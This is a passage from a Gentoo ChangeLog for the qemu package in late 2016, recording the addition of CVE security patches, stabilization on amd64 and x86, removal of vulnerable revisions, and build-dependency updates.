bug 594520 CVE-2016-7423.patch # bug 594368 Package-Manager: portage-2.3.0 27 Sep 2016; Agostino Sarubbo qemu-2.7.0-r4.ebuild: amd64 stable wrt bug #594368 Package-Manager: portage-2.2.28 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo 27 Sep 2016; Agostino Sarubbo qemu-2.7.0-r4.ebuild: x86 stable wrt bug #594368 Package-Manager: portage-2.2.28 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo 02 Oct 2016; Matthias Maier -qemu-2.7.0-r3.ebuild: drop vulnerable, bug #594368 Package-Manager: portage-2.3.0 *qemu-2.7.0-r5 (26 Oct 2016) 26 Oct 2016; Matthias Maier +files/qemu-2.7.0-CVE-2016-7907.patch, +files/qemu-2.7.0-CVE-2016-7908.patch, +files/qemu-2.7.0-CVE-2016-7909.patch, +files/qemu-2.7.0-CVE-2016-7994-1.patch, +files/qemu-2.7.0-CVE-2016-7994-2.patch, +files/qemu-2.7.0-CVE-2016-8576.patch, +files/qemu-2.7.0-CVE-2016-8577.patch, +files/qemu-2.7.0-CVE-2016-8578.patch, +files/qemu-2.7.0-CVE-2016-8668.patch, +files/qemu-2.7.0-CVE-2016-8669-1.patch, +files/qemu-2.7.0-CVE-2016-8669-2.patch, +files/qemu-2.7.0-CVE-2016-8909.patch, +files/qemu-2.7.0-CVE-2016-8910.patch, +qemu-2.7.0-r5.ebuild: multiple security fixes for 2.7.0-r5 CVE-2016-7466, bug 594520 CVE-2016-7907, bug 596048 CVE-2016-7908, bug 596049 CVE-2016-7909, bug 596048 CVE-2016-7994, bug 596738 CVE-2016-7994, bug 596738 CVE-2016-8576, bug 596752 CVE-2016-8577, bug 596776 CVE-2016-8578, bug 596774 CVE-2016-8668, bug 597110 CVE-2016-8669, bug 597108 CVE-2016-8669, bug 597108 CVE-2016-8909, bug 598044 CVE-2016-8910, bug 598046 Package-Manager: portage-2.3.0 27 Oct 2016; Agostino Sarubbo qemu-2.7.0-r5.ebuild: amd64 stable wrt bug #598046 Package-Manager: portage-2.3.0 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo 27 Oct 2016; Agostino Sarubbo qemu-2.7.0-r5.ebuild: x86 stable wrt bug #598046 Package-Manager: portage-2.3.0 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo 27 Oct 2016; Matthias Maier -qemu-2.7.0-r4.ebuild: drop vulnerable 2.7.0-r4, bug #598046 Package-Manager: portage-2.3.0 *qemu-2.7.0-r6 (12 Nov 2016) 12 Nov 2016; Matthias Maier +files/qemu-2.7.0-CVE-2016-9102.patch, +files/qemu-2.7.0-CVE-2016-9103.patch, +files/qemu-2.7.0-CVE-2016-9104.patch, +files/qemu-2.7.0-CVE-2016-9105.patch, +files/qemu-2.7.0-CVE-2016-9106.patch, +qemu-2.7.0-r6.ebuild: security fixes, bug #598772 CVE-2016-9102, bug #598328 CVE-2016-9103, bug #598328 CVE-2016-9104, bug #598328 CVE-2016-9105, bug #598328 CVE-2016-9106, bug #598772 Package-Manager: portage-2.3.0 *qemu-2.7.0-r7 (12 Nov 2016) 12 Nov 2016; Matthias Maier -qemu-2.7.0-r6.ebuild, +qemu-2.7.0-r7.ebuild: update build dependency to vte:2.91, bug #595890 Package-Manager: portage-2.3.0 12 Nov 2016; Matthias Maier qemu-9999.ebuild: update build dependency to vte:2.91, bug #595890 Package-Manager: portage-2.3.0 13 Nov 2016; Agostino Sarubbo qemu-2.7.0-r7.ebuild: amd64 stable wrt bug #598772 Package-Manager: portage-2.3.0 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo 13 Nov 2016; Agostino Sarubbo qemu-2.7.0-r7.ebuild: x86 stable wrt bug #598772 Package-Manager: portage-2.3.0 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo 13 Nov 2016; Matthias Maier -qemu-2.7.0-r5.ebuild: drop vulnerable 2.7.0-r5, bug #598772 Package-Manager: portage-2.3.0 15 Nov 2016; Mike Frysinger qemu-2.7.0-r7.ebuild: drop libpcre dep as qemu does not use it #591202 15 Nov 2016; Mike Frysinger qemu-9999.ebuild: sync readme #575326 and gbm updates #590230